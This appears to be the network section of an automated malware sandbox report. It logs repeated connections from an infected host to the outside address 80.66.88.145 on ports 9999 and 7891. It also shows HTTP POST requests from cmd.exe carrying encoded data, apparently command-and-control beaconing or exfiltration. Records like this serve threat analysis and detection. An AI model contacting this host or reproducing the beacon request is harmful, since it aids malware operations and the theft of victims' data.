                                                         Jul 26, 2023 14:01:06.849031925 CEST  9999         49693      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:07.360358000 CEST  49693        9999       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:07.393773079 CEST  9999         49693      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:07.907313108 CEST  49693        9999       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:07.940556049 CEST  9999         49693      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:08.058561087 CEST  49694        9999       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:08.099719048 CEST  9999         49694      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:08.641751051 CEST  49694        9999       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:08.681644917 CEST  9999         49694      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:09.235543013 CEST  49694        9999       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:09.269253969 CEST  9999         49694      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:09.409147978 CEST  49695        9999       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:09.443409920 CEST  9999         49695      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:10.048125029 CEST  49695        9999       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:10.081598997 CEST  9999         49695      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:10.505003929 CEST  49696        7891       192.168.2.4   80.66.88.145
                                                         Jul 26, 2023 14:01:10.538868904 CEST  7891         49696      80.66.88.145  192.168.2.4
                                                         Jul 26, 2023 14:01:10.539031029 CEST  49696        7891       192.168.2.4   80.66.88.145
                                                        Jul 26, 2023 14:01:10.539072990 CEST496967891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:10.574842930 CEST78914969680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:10.576016903 CEST78914969680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:10.576062918 CEST78914969680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:10.576136112 CEST496967891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:10.576136112 CEST496967891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:10.735654116 CEST496959999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:10.778984070 CEST99994969580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:11.321501017 CEST496967891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.348306894 CEST496977891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.355397940 CEST78914969680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:11.386725903 CEST78914969780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:11.386933088 CEST496977891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.422662973 CEST496977891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.430847883 CEST496989999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.465109110 CEST99994969880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:11.466541052 CEST78914969780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:11.466737986 CEST78914969780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:11.466835022 CEST496977891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.466973066 CEST78914969780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:11.467170000 CEST496977891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.485348940 CEST496977891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:11.518922091 CEST78914969780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:12.048228025 CEST496989999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:12.081741095 CEST99994969880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:12.735822916 CEST496989999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:12.769140005 CEST99994969880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:12.877263069 CEST496999999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:12.911011934 CEST99994969980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:13.548459053 CEST496999999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:13.584130049 CEST99994969980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:14.124579906 CEST496999999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:14.161727905 CEST99994969980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:14.284281015 CEST497009999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:14.322448969 CEST99994970080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:14.829849958 CEST497009999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:14.874561071 CEST99994970080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.376637936 CEST497009999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.416196108 CEST99994970080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.526289940 CEST497019999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.554184914 CEST497027891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.559758902 CEST99994970180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.589715004 CEST78914970280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.589864969 CEST497027891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.589994907 CEST497027891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.624844074 CEST78914970280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.624886990 CEST78914970280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.625071049 CEST497027891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.625096083 CEST78914970280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.625353098 CEST497027891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.636919975 CEST497027891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.677680969 CEST78914970280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.685345888 CEST497037891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.719986916 CEST78914970380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.720359087 CEST497037891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.720359087 CEST497037891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.758169889 CEST78914970380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.758243084 CEST78914970380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.758449078 CEST78914970380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:15.758537054 CEST497037891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.760215044 CEST497037891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.770390987 CEST497037891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:15.813632965 CEST78914970380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:16.064382076 CEST497019999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:16.097584963 CEST99994970180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:16.611161947 CEST497019999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:16.645031929 CEST99994970180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:16.752796888 CEST497049999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:16.786209106 CEST99994970480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:17.298692942 CEST497049999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:17.332231998 CEST99994970480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:17.845773935 CEST497049999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:17.879286051 CEST99994970480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:17.989850998 CEST497059999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:18.023366928 CEST99994970580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:18.533186913 CEST497059999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:18.590215921 CEST99994970580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.096314907 CEST497059999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.130830050 CEST99994970580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.343842983 CEST497069999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.383395910 CEST99994970680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.801110983 CEST497077891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.834755898 CEST78914970780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.834856033 CEST497077891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.834906101 CEST497077891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.870748997 CEST78914970780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.871012926 CEST78914970780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.871033907 CEST78914970780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.871062040 CEST497077891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.871112108 CEST497077891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.876703978 CEST497077891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.892653942 CEST497069999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.910164118 CEST497087891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.911758900 CEST78914970780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.926814079 CEST99994970680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.943942070 CEST78914970880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.944116116 CEST497087891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.944116116 CEST497087891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.982505083 CEST78914970880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.982532978 CEST78914970880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.982628107 CEST497087891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.982789993 CEST78914970880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.983088970 CEST497087891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.987334967 CEST497087891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:20.021074057 CEST78914970880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:20.439600945 CEST497069999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:20.476485014 CEST99994970680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:20.608046055 CEST497099999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:20.641484022 CEST99994970980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:21.142771959 CEST497099999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:21.176506042 CEST99994970980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:21.689762115 CEST497099999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:21.723001003 CEST99994970980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:21.847862959 CEST497109999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:21.881231070 CEST99994971080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:22.392935991 CEST497109999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:22.426639080 CEST99994971080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:22.939821959 CEST497109999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:22.974634886 CEST99994971080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:23.085031033 CEST497119999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:23.118896008 CEST99994971180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:23.627378941 CEST497119999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:23.662477016 CEST99994971180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:00.927994967 CEST497157891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:00.931356907 CEST497169999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:00.961850882 CEST78914971580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:00.961965084 CEST497157891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:00.962183952 CEST497157891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:00.965502024 CEST99994971680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.004143000 CEST78914971580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.004174948 CEST78914971580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.004198074 CEST78914971580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.004300117 CEST497157891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.004300117 CEST497157891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.004723072 CEST497157891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.028232098 CEST497177891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.037998915 CEST78914971580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.061676979 CEST78914971780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.062431097 CEST497177891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.069787025 CEST497177891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.108280897 CEST78914971780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.108319998 CEST78914971780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.108464003 CEST497177891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.108652115 CEST78914971780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.110415936 CEST497177891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.115856886 CEST497177891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.151561022 CEST78914971780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.474411011 CEST497169999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.509088993 CEST99994971680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:02.021331072 CEST497169999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:02.055414915 CEST99994971680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:02.056346893 CEST497189999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:02.089660883 CEST99994971880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:02.599500895 CEST497189999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:02.641977072 CEST99994971880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:03.146486998 CEST497189999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:03.180859089 CEST99994971880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:03.288168907 CEST497199999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:03.322976112 CEST99994971980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:03.834054947 CEST497199999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:03.877072096 CEST99994971980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:04.380899906 CEST497199999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:04.420496941 CEST99994971980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:04.688087940 CEST497209999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:04.721606970 CEST99994972080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.147707939 CEST497217891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.181451082 CEST78914972180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.181652069 CEST497217891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.224750996 CEST497209999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.239020109 CEST497217891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.258352995 CEST99994972080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.273132086 CEST78914972180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.273372889 CEST78914972180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.273463011 CEST497217891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.273566008 CEST78914972180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.273622990 CEST497217891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.273643970 CEST497217891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.295468092 CEST497227891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.334557056 CEST78914972280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.334728956 CEST497227891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.335280895 CEST497227891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.380939960 CEST78914972280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.380976915 CEST78914972280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.381000996 CEST78914972280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.381103992 CEST497227891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.381683111 CEST497227891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.425672054 CEST78914972280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.584157944 CEST497217891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.618590117 CEST78914972180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.771795988 CEST497209999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.805382967 CEST99994972080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:06.444715023 CEST497239999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:06.487299919 CEST99994972380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:07.053061008 CEST497239999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:07.087132931 CEST99994972380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:07.758995056 CEST497239999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:07.792361975 CEST99994972380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:07.962213993 CEST497249999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:07.995671034 CEST99994972480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:08.568836927 CEST497249999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:08.618976116 CEST99994972480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.162559986 CEST497249999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.196039915 CEST99994972480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.304306984 CEST497259999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.345258951 CEST99994972580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.413664103 CEST497267891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.450139999 CEST78914972680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.450227976 CEST497267891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.450376987 CEST497267891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.488392115 CEST78914972680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.488487005 CEST78914972680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.488603115 CEST497267891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.488679886 CEST78914972680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.488807917 CEST497267891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.488876104 CEST497267891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.522140980 CEST78914972680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.525751114 CEST497277891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.559201002 CEST78914972780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.559370041 CEST497277891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.559622049 CEST497277891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.599529982 CEST78914972780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.599540949 CEST78914972780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.599673033 CEST497277891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.599724054 CEST78914972780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:54.637907028 CEST99994976580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:55.150919914 CEST497659999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:55.184473991 CEST99994976580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:55.292439938 CEST497669999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:55.326154947 CEST99994976680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:55.838484049 CEST497669999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:55.871932030 CEST99994976680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:56.090620041 CEST497677891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.124300003 CEST78914976780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:56.124440908 CEST497677891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.126631021 CEST497677891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.160953999 CEST78914976780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:56.161010027 CEST78914976780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:56.161102057 CEST497677891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.161130905 CEST78914976780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:56.161950111 CEST497677891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.164416075 CEST497677891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.199006081 CEST78914976780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:56.385442972 CEST497669999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.420970917 CEST99994976680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:56.547276974 CEST497689999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.580784082 CEST99994976880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:57.088602066 CEST497689999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:57.123120070 CEST99994976880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:57.635545969 CEST497689999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:57.669370890 CEST99994976880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:57.784326077 CEST497699999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:57.817917109 CEST99994976980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:58.323050022 CEST497699999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:58.356657028 CEST99994976980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:58.870028019 CEST497699999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:58.903669119 CEST99994976980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:03:04.815387011 CEST497707891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:03:04.848939896 CEST78914977080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:03:04.849152088 CEST497707891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:03:04.849220991 CEST497707891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:03:04.883976936 CEST78914977080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:03:04.884015083 CEST78914977080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:03:04.884171963 CEST497707891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:03:04.884275913 CEST497707891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:03:04.884416103 CEST78914977080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:03:04.884478092 CEST497707891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:03:05.183080912 CEST497707891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:03:05.217839956 CEST78914977080.66.88.145192.168.2.4
• 80.66.88.145:7891
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49690 | 80.66.88.145 | 7891 | C:\Windows\SysWOW64\cmd.exe
Timestamp | kBytes transferred | Direction | Data
Jul 26, 2023 14:01:05.713223934 CEST | 1 | OUT | POST / HTTP/1.0
Host: 80.66.88.145:7891
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 658
Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aEylcE7lcEOhcEOlaHYlcE3JcEOrc%2BOlaDylcE7CcEOrboOlaH3lcEfPcEO4cEOlao3lcE36cEOhcDOlaD5lcE3rcEOrboOlaDklcE74cEO4cEOla%2BMlcEYrcEO8aEOlcDOlcEx6cEOhbEOla%2BxlcE36cEOhcDOlaHklcE3XcEOrX%2BOlcDOlcEklcEOrcoOlaDYlcEfmcEOrcoOlaD7lcE36cEO4cEOlcHxlcESlcEO6aoOlaKklcEk4cEOCaoOlaE7lcExJcEO6c%2BOlaoxlcEx6cEO6cDOlaEklcExCcEO4cEOlcHxlcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOraEOlcDOlcE76cEOhc%2BOlaD5lcEfPcEOra%2BOlcDOlcEAecEO6c%2BOlaE5lcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOhcDOlcDOlcE3rcEOhcDOlaH3lcEfecEO4cEOla%2B7lcE7hcEOha%2BOlcHklcE36cEOhbEOlaDklcEfecEOhc%2BOlaD5lcEGPcEOrc%2BOlaH3lcEfecERZcfhC%2BDfZhS08nz&act=1000
Jul 26, 2023 14:01:05.789221048 CEST | 1 | IN | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4
Date: Wed, 26 Jul 2023 12:01:05 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49692 | 80.66.88.145 | 7891 | C:\Windows\SysWOW64\cmd.exe
Timestamp | kBytes transferred | Direction | Data
Jul 26, 2023 14:01:05.844060898 CEST | 3 | OUT | POST / HTTP/1.0
Host: 80.66.88.145:7891
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1054
